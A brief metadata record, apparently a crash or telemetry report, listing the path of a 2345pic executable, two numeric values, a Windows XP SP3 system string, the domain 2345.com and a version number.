D:\dream\2345pic_k1252705.exe

386532461

1310958

Windows 5.1(Service Pack 3)

2345.com

5.3.1.6606